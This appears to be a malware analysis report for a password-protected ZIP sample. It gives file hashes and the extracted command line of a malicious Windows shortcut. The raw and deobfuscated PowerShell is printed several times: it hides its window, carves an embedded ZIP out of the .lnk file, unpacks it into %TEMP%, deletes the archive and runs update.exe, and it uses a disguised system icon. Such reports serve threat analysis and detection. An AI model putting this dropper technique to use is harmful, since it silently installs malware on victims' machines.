bb952709ef032b6e89a58f96a025b1b73eb16a[...]ted.zip
ZIP Archive | MD5: ef4bb8f41f4262193eb2b599c573ba40 | Size: 207.89 KB | application/zip
|
Hash | Hash Value |
|---|---|
| MD5 | ef4bb8f41f4262193eb2b599c573ba40
|
| Sha1 | baa0b861db90f186fdc481facdb2bdfc74b4f70a
|
| Sha256 | 4d9d5dddb6c278fc4c4c24d73a01500194992b1d0254e9faec9ff4fa22cbe94f
|
| Sha384 | 8a7b94ebfbf555a7c33db6479dcc04c8507939edfb71c8b984d7baad8d66a981a53ec98f880bb979054c37b45ddd2b2d
|
| Sha512 | 66e04a675d3efeb44d5dbb550a229e981dd4605de87eb50e38d4a0e31ae8189e5cddbd07cb44f58b942e8a3390fc20414a40407d05c2cb76af77141b3c4bec1b
|
| SSDeep | 3072:xtYbURcUZ022l6z/MUfS3jGja6gqAPyOLRQX91pSmKMb+UBbDnExFG:x+URcE5fpjx5K9LG9/SHhCbDnExY
|
| TLSH | 8B14131A2485BE53DFE488F46D944A04CD8F2EA4FEB700D419AB7BB7F0CA457BD058A4
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe |
| Deobfuscated PowerShell | $obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe |
| Deobfuscated PowerShell | $obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe iconlocation: "%WINDIR%\System32\UserAccountControlSettings.exe" extradata: environmentvariabledatablock: headerblocksize: 788 788 blocksignature: -1610612735 targetansi: "%windir%\system32\cmd.exe" targetunicode: "%windir%\system32\cmd.exe" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe Malicious |
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk |
| Deobfuscated PowerShell | $obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe Malicious |
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk > LNK CommandLine > [PowerShell Command] |
| Deobfuscated PowerShell | $obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe iconlocation: "%WINDIR%\System32\UserAccountControlSettings.exe" extradata: environmentvariabledatablock: headerblocksize: 788 788 blocksignature: -1610612735 targetansi: "%windir%\system32\cmd.exe" targetunicode: "%windir%\system32\cmd.exe" Malicious |
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk > [Lnk Summary] > [PowerShell Command] |